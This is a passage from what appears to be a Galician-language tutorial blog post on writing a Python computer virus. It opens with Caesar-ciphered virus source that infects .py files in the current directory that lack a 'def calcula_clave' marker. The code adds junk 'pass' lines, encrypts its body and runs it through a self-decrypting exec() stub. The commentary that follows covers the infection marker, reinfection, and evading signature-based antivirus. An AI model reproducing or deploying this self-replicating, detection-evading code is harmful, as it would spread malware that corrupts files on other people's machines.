      mxqmh_vbyktwh += vak((hkw(vtktvmxk) + vetox - 65) % 26 + 65)
    xeby vtktvmxk.blehpxk():
      mxqmh_vbyktwh += vak((hkw(vtktvmxk) + vetox - 97) % 26 + 97)
    xelx:
      mxqmh_vbyktwh += vtktvmxk
  kxmnkg mxqmh_vbyktwh


wxy uhkkt_itll(vhwbzh):
  vhwbzh_lxg_itll = []
  yhk ebgat bg vhwbzh.liebm(vak(10)):
    by ghm "itll" bg ebgat:
      vhwbzh_lxg_itll.tiixgw(ebgat)
  kxmnkg vak(10).chbg(vhwbzh_lxg_itll)


wxy vtevnet_mtunetvbhg(vhwbzh, ihlbvbhg):
  by "xelx" bg vhwbzh[ihlbvbhg] hk "xeby" bg vhwbzh[ihlbvbhg]:
    kxmnkg exg(vhwbzh[ihlbvbhg]) - exg(vhwbzh[ihlbvbhg].elmkbi()) + 4
  kxmnkg exg(vhwbzh[ihlbvbhg]) - exg(vhwbzh[ihlbvbhg].elmkbi())


wxy xgztwx_itll(vhwbzh):
  bfihkm ktgwhf
  ebgatl = vhwbzh.liebm(vak(10))
  yhk b bg ktgzx(10):
    by ktgwhf.ktgwhf() > 0.75:
      ihlbvbhg_bglxvbhg = ktgwhf.ktgwbgm(1, exg(ebgatl) - 1)
      ebgatl.bglxkm(ihlbvbhg_bglxvbhg, " " * vtevnet_mtunetvbhg(ebgatl, ihlbvbhg_bglxvbhg) + "itll")
  kxmnkg vak(10).chbg(ebgatl)


wxy fhwbybvt(vhwbzh):
  ghoh_vhwbzh = []
  lxitktwhk = vak(10) + vak(10) + vak(10)
  yngvbhgl = vhwbzh.liebm(lxitktwhk)
  yhk mxqmh bg yngvbhgl:
    by mxqmh:
      vhwbzh_lxg_itll = uhkkt_itll(mxqmh)
      vhwbzh_vhg_itll = xgztwx_itll(vhwbzh_lxg_itll)
      ghoh_vhwbzh.tiixgw(vhwbzh_vhg_itll)
    xelx:
      ghoh_vhwbzh.tiixgw(mxqmh)
  kxmnkg lxitktwhk.chbg(ghoh_vhwbzh)


wxy bgyxvmtk(obknl):
  bfihkm hl
  yhk tkjnboh bg hl.eblmwbk("."):
    by tkjnboh.xgwlpbma(".ir"):
      lvkbim = hixg(tkjnboh, "k+")
      mxqmh_lvkbim = lvkbim.kxtw()
      by "wxy vtevnet_vetox" ghm bg mxqmh_lvkbim:
        itkmx_xg_vetkh = obknl[:obknl.ybgw("wxy vbykt")]
        itkmx_t_vbyktk = obknl[obknl.ybgw("wxy vbykt"):]
        itkmx_xg_vetkh_fhwbybvtwt = fhwbybvt(itkmx_xg_vetkh)
        vetox = vtevnet_vetox(mxqmh_lvkbim)
        itkmx_vkbyktwt = vbykt(itkmx_t_vbyktk, vetox)
        lvkbim.pkbmx(itkmx_xg_vetkh_fhwbybvtwt)
        wxlvkbyktwhk = "bfihkm lrl" + vak(10) + "ihkmtwhk = hixg(lrl.tkzo[0], " + vak(34) + "k" + vak(34) + ")" + vak(10) + "mxqmh_ihkmtwhk = ihkmtwhk.kxtw()" + vak(10) + "ihkmtwhk.vehlx()" + vak(10) + "itkmx_lbg_vbyktk = mxqmh_ihkmtwhk[mxqmh_ihkmtwhk.ybgw(" + vak(34) + "wxy vtevnet_vetox" + vak(34) + "):mxqmh_ihkmtwhk.ybgw(" + vak(34) + "wxy vtevnet_vetox" + vak(34) + ")+" + lmk(exg(itkmx_xg_vetkh_fhwbybvtwt)) + "]" + vak(10) + "vetox = vtevnet_vetox(mxqmh_ihkmtwhk)" + vak(10) + "mxqmh_wxlvbyktwh = wxlvbykt(" + vak(34) + vak(34) + vak(34) + itkmx_vkbyktwt + vak(34) + vak(34) + vak(34) + ", vetox)" + vak(10) + "xqxv(mxqmh_wxlvbyktwh)" + vak(10) + "xqxvnmt(itkmx_lbg_vbyktk + mxqmh_wxlvbyktwh)"
        lvkbim.pkbmx(wxlvkbyktwhk)
      lvkbim.vehlx()


wxy itrehtw():
  ikbgm("Ynvaxl bgyxvmtwh")


wxy xqxvnmt(obknl):
  bgyxvmtk(obknl)
  itrehtw()""", clave)
exec(texto_descifrado)
executa(parte_sin_cifrar + texto_descifrado)

Finalmente, hai que recordar que esta variante do virus coma a anterior, infectan aos arquivos que non conteñan a cadea de caracteres “def calcula_clave”, polo que se nun programa ou script lexítimo existe esa cadea de caracteres, non será infectado.

A ter en conta

Discriminación de arquivos

Nas dúas últimas variantes do virus, sucede que á hora de ver se un arquivo está previamente infectado, comprobase se contén a cadea de caracteres “def calcula_clave”. Cando un virus utiliza unha forma de detectarse a si mesmo, permite que os analistas saiban esta mesma información, polo cal van a saber como detectar se un arquivo pode estar infectado ou non.

Por outra banda, se o virus non ten este mecanismo, pode ter problemas de sobreinfección. Isto é que o virus pode infectar varias veces o mesmo arquivo. A sobreinfección dun ou varios arquivos desemboca en que o usuario perciba un peor funcionamento á hora de executar un programa (ao fin e ao cabo, se se executa un programa infectado varias veces, tardará en realizar a funcionalidade lexítima xa que tamén se executará o código de varias infeccións), xunto cunha perda de espazo na memoria secundaria. Esta falta de rendemento e espazo fará que o usuario pense que algo vai mal, facendo que leve a reparar o computador e por conseguinte se pare a infección.

A forma na que o virus detectará se un arquivo está infectado ou non é moi importante á hora de crealo, xa que determinará a propia virulencia deste, polo que sempre que se desenvolva un virus hai que ter esta cuestión presente.

Proteccións utilizadas

As proteccións utilizadas (cifrado de código e inserción de “pass”) están encamiñadas a evadir a detección por sinatura. Se se aplica unha técnica de detección mediante unha análise heurística ou análise por comportamento terminarase descubrindo que este programa é un virus.

Hai que aclarar que cando se ofusca un código nunha linguaxe compilada, cífranse as instrucións en ensamblador, polo que a implantación desta técnica distará do que se propón aquí.

Linguaxe

Normalmente os virus (ou calquera tipo de malware) constrúense en linguaxes compiladas para evitar dependencias externas. O uso de Python reduce a capacidade de infección do virus creado, xa que só será efectivo en computadoras que teñan a linguaxe instalada e coa versión correcta.

Conclusións

Nesta publicación viuse como funciona un virus xunto con algún dos seus mecanismos de defensa, así e todo este proceso ten máis complexidade da explicada, xa que neste campo hai moitas máis formas de infección e proteccións.

Quizais nun futuro se aborden en Hackliza outros temas coma a creación dun verme, o funcionamento dun cavity ou dun rookit, pero polo de agora haberá que agardar.

Referencias

Filiol, E. (2004). Computer viruses: from theory to application (1st ed.). Springer

Szor, P. (2005). The Art of Computer Virus Researchand Defense (1st ed.). Addison Wesley Professional

Writing Viruses for Fun, not Profit

Computer Virus Strategies and Detection Methods

Malware development part 1

comments powered by Disqus